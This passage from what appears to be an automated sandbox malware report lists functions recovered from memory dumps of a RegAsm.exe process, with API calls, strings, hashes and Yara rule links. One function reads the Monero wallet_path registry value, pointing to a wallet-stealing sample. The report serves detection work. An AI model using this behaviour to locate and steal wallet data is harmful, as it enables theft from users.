Instruction Fuzzy Hash: 58D05E31781224B7C6202BA4AD0AF667E28EB05AA2F400031FB0D96151C9A1551187EE

Function 19336B50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19336B50
cannot open file, xrefs: 19336B59
%s at line %d of [%.10s], xrefs: 19336B5E

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1799306995
Opcode ID: 34c86a9e4d26c07a92f986ef33332e68ae0855e56b73606ec19aff188fdd2295
Instruction ID: 65883b9421903416a39f9beae8cb119c3d3f43ae719ec7397f7fa0229ecee80a
Opcode Fuzzy Hash: 34c86a9e4d26c07a92f986ef33332e68ae0855e56b73606ec19aff188fdd2295
Instruction Fuzzy Hash: CBB0929E50428037FA11E9D4CC01FE72E216755A01FCDC8D4B19F7A2A6E096C990C652

Function 192D8EB0 Relevance: 6.2, APIs: 4, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cd04773ff6ea69c53ece6d19c78ac821d0af684a8ceca15d6e0b6151fcceda
Instruction ID: 99d4d106369463f244e98d45b70feb4280f069553606cd3c2bb075c3ce89298b
Opcode Fuzzy Hash: 74cd04773ff6ea69c53ece6d19c78ac821d0af684a8ceca15d6e0b6151fcceda
Instruction Fuzzy Hash: ED5166756063834FD710CF34E94579AFBE59F11312F1C46A9F8C88B282E269D588C3A2

Function 19257DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2407a907457184c818c8aa6451e2e7201d9d5dd5751aa6df33c230082dbccd
Instruction ID: a889b2b4c64bfb5d448b9b45137d8f8c6705fbe5b6376399608af97c5cd112c8
Opcode Fuzzy Hash: 3b2407a907457184c818c8aa6451e2e7201d9d5dd5751aa6df33c230082dbccd
Instruction Fuzzy Hash: 5141E1766003029FE304CF18EA80A52F7E4FF84324F28856EE94787A52D772F851CB90

Function 1925CAE0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f39f167d02c50f06cb845048f37940f96d265dcd874dc334bfd5f41b3bb5c91
Instruction ID: 40df8b1170d7c13fb7acf0531ac5b7881871f019f543d2974ea845d9380a4492
Opcode Fuzzy Hash: 3f39f167d02c50f06cb845048f37940f96d265dcd874dc334bfd5f41b3bb5c91
Instruction Fuzzy Hash: 2B31A6B6B043029FE714DF68D940B96B3E4FF94311F18867AE906C7690E331E954D7A1

Function 1925B1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction ID: 82764899b5fa3fe48fadc7945ee7d3506a39666c56dd197ed819f93aeae09e3a
Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction Fuzzy Hash: B3317E75504B429BE320CB25F9406DAB7E0BF96315F288A2ED49BC6A40D371F488CBA5

Function 004117C4 Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004117C9
strtok_s.MSVCRT ref: 004117F0
StrCmpCA.SHLWAPI(00000000,00426570,?,?,?,?,00416EC0), ref: 00411821
strtok_s.MSVCRT ref: 00411882

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prolog
String ID:
API String ID: 1158113254-0
Opcode ID: a7300a0a27632c5de22bd116855e00c6bf58f51378818c6a308a569d76598784
Instruction ID: f1fda809e5c24f865e8d8af3438d5cd6a3e4cc09553546deba9be0eb83488091
Opcode Fuzzy Hash: a7300a0a27632c5de22bd116855e00c6bf58f51378818c6a308a569d76598784
Instruction Fuzzy Hash: 4E21D771600605AFCB18EFA1D9C1EFBB7ACEF18314B10853FE116D65A1DB38E985C658

Function 00411649 Relevance: 6.1, APIs: 4, Instructions: 78stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041164E
strtok_s.MSVCRT ref: 00411675
StrCmpCA.SHLWAPI(00000000,00426564,00000001,?,?,?,00416DD9), ref: 004116B1

Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4

strtok_s.MSVCRT ref: 004116ED

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prologlstrcpylstrlen
String ID:
API String ID: 539094379-0
Opcode ID: e04e54de1f4c428c472027806aecd0d9a346fbe0422c17b076ca8ae4093683bc
Instruction ID: 94ebce82879aab40b33730a641183e694e8fbbb9ae688793fb06155610798229
Opcode Fuzzy Hash: e04e54de1f4c428c472027806aecd0d9a346fbe0422c17b076ca8ae4093683bc
Instruction Fuzzy Hash: 382103B1600605ABCB14DF95D981BEFB3A8EF04315F04423FE106E65A1DB78EA488A68

Function 192CCFE0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
Instruction ID: d16e69c3a4952b10889900b8ca7752c5d1edeae7aff89b4891b1d9edaf537826
Opcode Fuzzy Hash: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
Instruction Fuzzy Hash: DE21B0756007069FD750EF68C980A5ABBF0EF98340F94492DF985C3221E731E658CB92

Function 1942F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1942F4E0
GetLastError.KERNEL32(?,?,?,?), ref: 1942F4ED
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1942F513
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1942F539

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 372c5fef5cd4de1566ead53b3ba4f2a0e332219e918e2c774069f7b847cfce26
Instruction ID: 99bf154c8490f8b2ccd39811a02bfeb356debfbf449602ac63b32ac0c45f017b
Opcode Fuzzy Hash: 372c5fef5cd4de1566ead53b3ba4f2a0e332219e918e2c774069f7b847cfce26
Instruction Fuzzy Hash: C3115771800169BBDF148FA5DC489DF3F79FF00760F948684F828A22A0D771EA80CBA0

Function 00419049 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0041906F

Part of subcall function 00418E9B: __fltout2.LIBCMT ref: 00418EC6

__cftog_l.LIBCMT ref: 00419095
__cftoe_l.LIBCMT ref: 004190C7

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 6c12d003c91e958138eed580c0154e496b93e037388a0c8d124b30f15893669d
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 1911403644014AFBCF225E95CC11CEE3F62BB1C354B58845AFE2959131D73AC9B2AB89

Function 0040FA9C Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FAA1
lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
lstrcpy.KERNEL32(00000000), ref: 0040FAF0
lstrcat.KERNEL32(?,?), ref: 0040FAFB

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcatlstrcpylstrlen
String ID:
API String ID: 809291720-0
Opcode ID: 39667344f9101b2b7fe644fc43952dc8d56ac4cd1daba7bc967c80c1a343ed11
Instruction ID: 38bc537ac666268100f5265c1d729237def4eef846b7224f466c0159986bfced
Opcode Fuzzy Hash: 39667344f9101b2b7fe644fc43952dc8d56ac4cd1daba7bc967c80c1a343ed11
Instruction Fuzzy Hash: 90015AB6900215EFDB209F99D88499AFBF5FF48314B10883EE999E3610C775A944CF50

Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24

Function 19232ABD Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19431382
GetLastError.KERNEL32 ref: 1943138E
___initconout.LIBCMT ref: 1943139E

Part of subcall function 19431303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,194313A3), ref: 19431316

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 194313B3

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: 5bdda93cb470876f61cf5cb3b292e93843aedf879c01a46b6f992b323bfaeb41
Instruction ID: 1d9d71e6ed79e4e816b6baf395c724ec7c9ca5ab1b598d0635942dc35090bd87
Opcode Fuzzy Hash: 5bdda93cb470876f61cf5cb3b292e93843aedf879c01a46b6f992b323bfaeb41
Instruction Fuzzy Hash: 99F082360001B9BFDF121FF5CC4498A3F71FB0C6A2F448110FD1C85610CA32C9609B90

Function 1924BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1924C1B5

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 03ad48fd5271005a895a4a74d1933f26b8dbf84ef3a4c860eb3470918df7decb
Instruction ID: 598f14b925c24b28b2304a95ac1bf20a3ae7b0fe2be7348e3c666d172691c3be
Opcode Fuzzy Hash: 03ad48fd5271005a895a4a74d1933f26b8dbf84ef3a4c860eb3470918df7decb
Instruction Fuzzy Hash: 38A1E175E097878FD708CE2CC9417AAB7D1AF89220F3D2B1DF8A5472E1E770D4858A91

Function 193B7300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

%!.15g, xrefs: 193B75C3
-, xrefs: 193B7538

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$-
API String ID: 0-583212262
